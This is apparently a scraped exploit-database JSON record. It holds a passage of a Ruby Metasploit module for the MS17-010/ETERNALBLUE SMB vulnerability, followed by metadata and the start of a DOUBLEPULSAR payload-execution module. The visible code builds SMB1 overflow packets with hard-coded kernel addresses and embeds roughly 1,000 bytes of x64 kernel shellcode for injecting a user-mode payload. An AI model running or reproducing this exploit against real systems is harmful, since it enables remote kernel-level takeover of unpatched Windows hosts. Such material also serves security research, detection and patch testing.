# Max Data Count\r\n pkt << \"\\x00\" # Max Setup Count\r\n pkt << \"\\x00\" # Reserved\r\n pkt << \"\\x00\\x10\" # Flags\r\n pkt << \"\\x35\\x00\\xd0\" # Timeouts\r\n pkt << timeout.chr\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << \"\\x00\\x10\" # Parameter Count\r\n\r\n #pkt << \"\\x74\\x70\" # Parameter Offset\r\n #pkt << \"\\x47\\x46\" # Data Count\r\n #pkt << \"\\x45\\x6f\" # Data 
Offset\r\n #pkt << \"\\x4c\" # Setup Count\r\n #pkt << \"\\x4f\" # Reserved\r\n\r\n if type == :eb_trans2_exploit\r\n vprint_status(\"Making :eb_trans2_exploit packet\")\r\n\r\n pkt << \"\\x41\" * 2957\r\n\r\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\r\n\r\n pkt << \"\\x00\" * 0x10\r\n pkt << \"\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x6\r\n pkt << \"\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x16\r\n\r\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\r\n pkt << \"\\x00\" * 0x8\r\n pkt << \"\\x20\\xf0\\xdf\\xff\"\r\n\r\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\r\n\r\n pkt << \"\\x60\\x00\\x04\\x10\"\r\n pkt << \"\\x00\" * 4\r\n\r\n pkt << \"\\x80\\xef\\xdf\\xff\"\r\n\r\n pkt << \"\\x00\" * 4\r\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x10\r\n\r\n pkt << \"\\x60\\x00\\x04\\x10\"\r\n pkt << \"\\x00\" * 0xc\r\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\r\n pkt << \"\\x00\" * 0x8\r\n pkt << \"\\x80\\x10\"\r\n pkt << \"\\x00\" * 0xe\r\n pkt << \"\\x39\"\r\n pkt << \"\\xbb\"\r\n\r\n pkt << \"\\x41\" * 965\r\n\r\n return pkt\r\n end\r\n\r\n if type == :eb_trans2_zero\r\n vprint_status(\"Making :eb_trans2_zero packet\")\r\n pkt << \"\\x00\" * 2055\r\n pkt << \"\\x83\\xf3\"\r\n pkt << \"\\x41\" * 2039\r\n #pkt << \"\\x00\" * 4096\r\n else\r\n vprint_status(\"Making :eb_trans2_buffer packet\")\r\n pkt << \"\\x41\" * 4096\r\n end\r\n\r\n pkt\r\n\r\n end\r\n\r\n def make_smb1_nt_trans_packet(tree_id, user_id)\r\n pkt = \"\"\r\n pkt << \"\\x00\" # Session message\r\n pkt << \"\\x00\\x04\\x38\" # length\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\xa0\" # NT Trans\r\n pkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS\r\n pkt << \"\\x18\" # Flags\r\n pkt << \"\\x07\\xc0\" # Flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << 
[tree_id].pack(\"S>\") # TreeID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << [user_id].pack(\"S>\") # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexID\r\n\r\n pkt << \"\\x14\" # Word Count\r\n pkt << \"\\x01\" # Max Setup Count\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << \"\\x1e\\x00\\x00\\x00\" # Total Param Count\r\n pkt << \"\\xd0\\x03\\x01\\x00\" # Total Data Count\r\n pkt << \"\\x1e\\x00\\x00\\x00\" # Max Param Count\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Max Data Count\r\n pkt << \"\\x1e\\x00\\x00\\x00\" # Param Count\r\n pkt << \"\\x4b\\x00\\x00\\x00\" # Param Offset\r\n pkt << \"\\xd0\\x03\\x00\\x00\" # Data Count\r\n pkt << \"\\x68\\x00\\x00\\x00\" # Data Offset\r\n pkt << \"\\x01\" # Setup Count\r\n pkt << \"\\x00\\x00\" # Function <unknown>\r\n pkt << \"\\x00\\x00\" # Unknown NT transaction (0) setup\r\n pkt << \"\\xec\\x03\" # Byte Count\r\n pkt << \"\\x00\" * 0x1f # NT Parameters\r\n\r\n # undocumented\r\n pkt << \"\\x01\"\r\n pkt << \"\\x00\" * 0x3cd\r\n\r\n pkt\r\n end\r\n\r\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\r\n pkt = \"\"\r\n pkt << \"\\x00\" # Session message\r\n pkt << \"\\x00\\x00\\x51\" # length\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\x73\" # Session Setup AndX\r\n pkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS\r\n pkt << \"\\x18\" # Flags\r\n pkt << flags2 # Flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << \"\\x00\\x00\" # TreeID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << \"\\x00\\x00\" # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexID\r\n #pkt << \"\\x00\\x00\" # Reserved\r\n\r\n pkt << \"\\x0c\" # Word Count\r\n pkt << \"\\xff\" # No further commands\r\n pkt << \"\\x00\" # Reserved\r\n pkt << \"\\x00\\x00\" # AndXOffset\r\n pkt << \"\\x04\\x11\" # Max Buffer\r\n pkt << \"\\x0a\\x00\" # Max Mpx Count\r\n pkt << vcnum # VC Number\r\n pkt << \"\\x00\\x00\\x00\\x00\" # 
Session key\r\n pkt << \"\\x00\\x00\" # Security blob length\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Reserved\r\n pkt << \"\\x00\\x00\\x00\\x80\" # Capabilities\r\n pkt << \"\\x16\\x00\" # Byte count\r\n #pkt << \"\\xf0\" # Security Blob: <MISSING>\r\n #pkt << \"\\xff\\x00\\x00\\x00\" # Native OS\r\n #pkt << \"\\x00\\x00\" # Native LAN manager\r\n #pkt << \"\\x00\\x00\" # Primary domain\r\n pkt << native_os\r\n pkt << \"\\x00\" * 17 # Extra byte params\r\n\r\n pkt\r\n end\r\n\r\n def make_smb1_anonymous_login_packet\r\n # Neither Rex nor RubySMB appear to support Anon login?\r\n pkt = \"\"\r\n pkt << \"\\x00\" # Session message\r\n pkt << \"\\x00\\x00\\x88\" # length\r\n pkt << \"\\xffSMB\" # SMB1\r\n pkt << \"\\x73\" # Session Setup AndX\r\n pkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS\r\n pkt << \"\\x18\" # Flags\r\n pkt << \"\\x07\\xc0\" # Flags2\r\n pkt << \"\\x00\\x00\" # PID High\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature1\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Signature2\r\n pkt << \"\\x00\\x00\" # TreeID\r\n pkt << \"\\xff\\xfe\" # PID\r\n pkt << \"\\x00\\x00\" # Reserved\r\n pkt << \"\\x00\\x00\" # UserID\r\n pkt << \"\\x40\\x00\" # MultiplexID\r\n\r\n pkt << \"\\x0d\" # Word Count\r\n pkt << \"\\xff\" # No further commands\r\n pkt << \"\\x00\" # Reserved\r\n pkt << \"\\x88\\x00\" # AndXOffset\r\n pkt << \"\\x04\\x11\" # Max Buffer\r\n pkt << \"\\x0a\\x00\" # Max Mpx Count\r\n pkt << \"\\x00\\x00\" # VC Number\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Session key\r\n pkt << \"\\x01\\x00\" # ANSI pw length\r\n pkt << \"\\x00\\x00\" # Unicode pw length\r\n pkt << \"\\x00\\x00\\x00\\x00\" # Reserved\r\n pkt << \"\\xd4\\x00\\x00\\x00\" # Capabilities\r\n pkt << \"\\x4b\\x00\" # Byte count\r\n pkt << \"\\x00\" # ANSI pw\r\n pkt << \"\\x00\\x00\" # Account name\r\n pkt << \"\\x00\\x00\" # Domain name\r\n\r\n # Windows 2000 2195\r\n pkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\"\r\n pkt << 
\"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\"\r\n pkt << \"\\x00\\x00\"\r\n\r\n # Windows 2000 5.0\r\n pkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\"\r\n pkt << \"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\\x30\\x00\\x00\\x00\"\r\n\r\n pkt\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n # ep_thl_b = EPROCESS.ThreadListHead.Blink offset\r\n # et_alertable = ETHREAD.Alertable offset\r\n # teb_acp = TEB.ActivationContextPointer offset\r\n # et_tle = ETHREAD.ThreadListEntry offset\r\n def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)\r\n sc = make_kernel_shellcode\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n sc\r\n end\r\n\r\n def make_kernel_shellcode\r\n # https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm\r\n # Name: kernel\r\n # Length: 1019 bytes\r\n\r\n #\"\\xcc\"+\r\n \"\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\" +\r\n \"\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\\x00\\x00\\x00\\x48\\x89\\xC2\" +\r\n \"\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\\x65\\x48\\x89\\x24\\x25\\x10\" +\r\n \"\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x50\\x53\\x51\\x52\" +\r\n \"\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x41\\x54\\x41\\x55\\x41\" +\r\n \"\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\\x00\\x00\\x00\\x41\\x53\\x6A\" +\r\n \"\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\\x48\\x81\\xEC\\x58\\x01\\x00\" +\r\n \"\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\\x89\\x9D\\xC0\\x00\\x00\\x00\" +\r\n \"\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\\xD0\\x00\\x00\\x00\\x48\\xA1\" +\r\n \"\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x48\" +\r\n 
\"\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x30\\xFB\\xE8\" +\r\n \"\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x48\\x83\" +\r\n \"\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\\x41\\x5B\\x41\\x5A\\x41\\x59\" +\r\n \"\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\\x48\\x8B\\x24\\x25\\x10\\x00\" +\r\n \"\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\\xD0\\xFF\\x56\\x41\\x57\\x41\" +\r\n \"\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\\x66\\x83\\xE4\\xF0\\x48\\x83\" +\r\n \"\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\\x4C\\x8B\\x3C\\x25\\x38\\x00\" +\r\n \"\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\\x49\\xC1\\xE7\\x0C\\x49\\x81\" +\r\n \"\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\\xFE\\x4D\\x5A\\x75\\xEF\\x41\" +\r\n \"\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\\x48\\x89\\xC6\\x48\\x81\\xC6\" +\r\n \"\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\\xE8\\x03\\x02\\x00\\x00\\x48\" +\r\n \"\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\\x00\\x05\\x00\\x00\\x48\\x39\" +\r\n \"\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\\x36\\x48\\x39\\xCE\\x75\\xE2\" +\r\n \"\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\\x81\\xF9\\x00\\x00\\x01\\x00\" +\r\n \"\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\\xCB\\x41\\xBB\\x66\\x55\\xA2\" +\r\n \"\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\\x49\\x8B\\x0E\\x41\\xBB\\xA3\" +\r\n \"\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\\xC6\\xE8\\x50\\x01\\x00\\x00\" +\r\n \"\\x41\\x81\\xF9\\xBF\\x77\\x1F\\xDD\\x75\\xBC\\x49\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\" +\r\n \"\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\\x11\\xDC\\xE8\\x81\\x01\\x00\" +\r\n \"\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\\x4E\\x08\\x49\\xC7\\x01\\x00\" +\r\n \"\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\\xC9\\x48\\x89\\x0A\\x48\\xF7\" +\r\n \"\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\\x20\\xE8\\x52\\x01\\x00\\x00\" 
+\r\n \"\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\\x3E\\x48\\x8D\\x35\\xE9\\x00\" +\r\n \"\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\\x00\\x66\\x81\\xC1\\xF9\\x00\" +\r\n \"\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x48\\x89\\xF1\\x48\" +\r\n \"\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\\x48\\x83\\xEC\\x20\\x41\\xBB\" +\r\n \"\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\\x83\\xC4\\x20\\x5A\\x59\\x48\" +\r\n \"\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\\x00\\x48\\x85\\xC0\\x74\\x0C\" +\r\n \"\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\\x72\\x05\\x48\\x8B\\x09\\xEB\" +\r\n \"\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\\x80\\xC2\\x90\\x31\\xC9\\x41\" +\r\n \"\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\\x48\\x89\\xC1\\x4C\\x8D\\x89\" +\r\n \"\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\\xE2\\x49\\x89\\xC4\\x4D\\x31\" +\r\n \"\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\\x50\\x48\\x83\\xEC\\x20\\x41\" +\r\n \"\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\\x31\\xD2\\x52\\x52\\x41\\x58\" +\r\n \"\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\\x9E\\xE8\\x82\\x00\\x00\\x00\" +\r\n \"\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\\x74\\x00\\x00\\x00\\x48\\x89\" +\r\n \"\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\\x00\\x00\\x48\\x89\\xEC\\x5D\" +\r\n \"\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\\xC3\\xE9\\xB5\\x00\\x00\\x00\" +\r\n \"\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x3C\\x61\\x7C\\x02\\x2C\\x20\" +\r\n \"\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\" +\r\n \"\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\\x48\\x8B\\x72\\x50\\x48\\x0F\" +\r\n \"\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\" +\r\n \"\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\" +\r\n 
\"\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xC2\\x8B\" +\r\n \"\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xD0\\x50\\x8B\" +\r\n \"\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\" +\r\n \"\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\\xD9\\x75\\xEC\\x58\\x44\\x8B\" +\r\n \"\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\\x01\" +\r\n \"\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\\x5A\\x41\\x58\\x41\\x59\\x41\" +\r\n \"\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\\x89\\xE5\\x48\\x83\\xEC\\x20\" +\r\n \"\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\\xFF\\x31\\xC9\\x51\\x51\\x51\" +\r\n \"\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\\x5A\\x48\\x83\\xEC\\x20\\x41\" +\r\n \"\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\\x48\\x89\\xEC\\x5D\\x41\\x5F\" +\r\n \"\\x5E\\xC3\"\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-12] #", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}, {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f7b4a950dfa38196577777902e8186fb", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-11-18T10:01:02", "history": [{"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "17d700fd854b12d8236aeb17651589d3", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/33313", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2019-12-04T03:58:12", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": 
["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", 
"THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2019-12-04T03:58:12", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2019-12-04T03:58:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke 
